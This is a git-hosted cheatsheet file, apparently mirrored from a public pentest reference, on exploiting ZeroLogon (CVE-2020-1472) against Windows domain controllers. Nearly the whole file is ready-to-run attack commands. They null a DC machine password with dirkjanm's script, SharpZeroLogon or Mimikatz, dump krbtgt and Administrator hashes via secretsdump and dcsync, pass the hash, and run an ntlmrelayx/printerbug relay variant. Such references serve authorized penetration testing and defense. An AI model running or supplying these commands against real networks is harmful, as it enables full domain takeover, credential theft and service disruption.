daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

zerologon.md (4384B)


      1 ---
      2 title: "ZeroLogon"
      3 section: "Active Directory"
      4 sectionSlug: "active-directory"
      5 sourcePath: "docs/active-directory/CVE/ZeroLogon.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/CVE/ZeroLogon.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # ZeroLogon
     12 
     13 > CVE-2020-1472
     14 
     15 **Exploitation**:
     16 
     17 1. Spoofing the client credential
     18 2. Disabling signing and sealing
     19 3. Spoofing a call
     20 4. Changing a computer's AD password to null
     21 5. From password change to domain admin
     22 6. :warning: reset the computer's AD password in a proper way to avoid any Deny of Service
     23 
     24 **Tools**:
     25 
     26 * `cve-2020-1472-exploit.py` - Python script from [dirkjanm](https://github.com/dirkjanm)
     27 
     28 ```powershell
     29 # Check (https://github.com/SecuraBV/CVE-2020-1472)
     30 proxychains python3 zerologon_tester.py DC01 172.16.1.5
     31 
     32 $ git clone https://github.com/dirkjanm/CVE-2020-1472.git
     33 
     34 # Activate a virtual env to install impacket
     35 $ python3 -m venv venv
     36 $ source venv/bin/activate
     37 $ pip3 install .
     38 
     39 # Exploit the CVE (https://github.com/dirkjanm/CVE-2020-1472/blob/master/cve-2020-1472-exploit.py)
     40 proxychains python3 cve-2020-1472-exploit.py DC01 172.16.1.5
     41 
     42 # Find the old NT hash of the DC
     43 proxychains secretsdump.py -history -just-dc-user 'DC01$' -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'CORP/DC01$@DC01.CORP.LOCAL'
     44 
     45 # Restore password from secretsdump 
     46 # secretsdump will automatically dump the plaintext machine password (hex encoded) 
     47 # when dumping the local registry secrets on the newest version
     48 python restorepassword.py CORP/DC01@DC01.CORP.LOCAL -target-ip 172.16.1.5 -hexpass e6ad4c4f64e71cf8c8020aa44bbd70ee711b8dce2adecd7e0d7fd1d76d70a848c987450c5be97b230bd144f3c3
     49 deactivate
     50 ```
     51 
     52 * `nccfsas` - .NET binary for Cobalt Strike's execute-assembly
     53 
     54 ```powershell
     55 git clone https://github.com/nccgroup/nccfsas
     56 # Check
     57 execute-assembly SharpZeroLogon.exe win-dc01.vulncorp.local
     58 
     59 # Resetting the machine account password
     60 execute-assembly SharpZeroLogon.exe win-dc01.vulncorp.local -reset
     61 
     62 # Testing from a non Domain-joined machine
     63 execute-assembly SharpZeroLogon.exe win-dc01.vulncorp.local -patch
     64 
     65 # Now reset the password back
     66 ```
     67 
     68 * `Mimikatz` - 2.2.0 20200917 Post-Zerologon
     69 
     70 ```powershell
     71 privilege::debug
     72 # Check for the CVE
     73 lsadump::zerologon /target:DC01.LAB.LOCAL /account:DC01$
     74 
     75 # Exploit the CVE and set the computer account's password to ""
     76 lsadump::zerologon /target:DC01.LAB.LOCAL /account:DC01$ /exploit
     77 
     78 # Execute dcsync to extract some hashes
     79 lsadump::dcsync /domain:LAB.LOCAL /dc:DC01.LAB.LOCAL /user:krbtgt /authuser:DC01$ /authdomain:LAB /authpassword:"" /authntlm
     80 lsadump::dcsync /domain:LAB.LOCAL /dc:DC01.LAB.LOCAL /user:Administrator /authuser:DC01$ /authdomain:LAB /authpassword:"" /authntlm
     81 
     82 # Pass The Hash with the extracted Domain Admin hash
     83 sekurlsa::pth /user:Administrator /domain:LAB /rc4:HASH_NTLM_ADMIN
     84 
     85 # Use IP address instead of FQDN to force NTLM with Windows APIs 
     86 # Reset password to Waza1234/Waza1234/Waza1234/
     87 # https://github.com/gentilkiwi/mimikatz/blob/6191b5a8ea40bbd856942cbc1e48a86c3c505dd3/mimikatz/modules/kuhl_m_lsadump.c#L2584
     88 lsadump::postzerologon /target:10.10.10.10 /account:DC01$
     89 ```
     90 
     91 * `netexec` - only check
     92 
     93 ```powershell
     94 netexec smb 10.10.10.10 -u username -p password -d domain -M zerologon
     95 ```
     96   
     97 A 2nd approach to exploit zerologon is done by relaying authentication.
     98 
     99 This technique, [found by dirkjanm](https://dirkjanm.io/a-different-way-of-abusing-zerologon), requires more prerequisites but has the advantage of having no impact on service continuity.
    100 The following prerequisites are needed:
    101 
    102 * A domain account
    103 * One DC running the `PrintSpooler` service
    104 * Another DC vulnerable to zerologon
    105 
    106 * `ntlmrelayx` - from Impacket and any tool such as [`printerbug.py`](https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py)
    107 
    108 ```powershell
    109 # Check if one DC is running the PrintSpooler service
    110 rpcdump.py 10.10.10.10 | grep -A 6 "spoolsv"
    111 
    112 # Setup ntlmrelay in one shell
    113 ntlmrelayx.py -t dcsync://DC01.LAB.LOCAL -smb2support
    114 
    115 #Trigger printerbug in 2nd shell
    116 python3 printerbug.py 'LAB.LOCAL'/joe:Password123@10.10.10.10 10.10.10.12
    117 ```
    118 
    119 ## References
    120 
    121 * [Zerologon:Unauthenticated domain controller compromise by subverting Netlogon cryptography (CVE-2020-1472) - Tom Tervoort - September 15, 2020](https://web.archive.org/web/20200915011856/https://www.secura.com/pathtoimg.php?id=2055)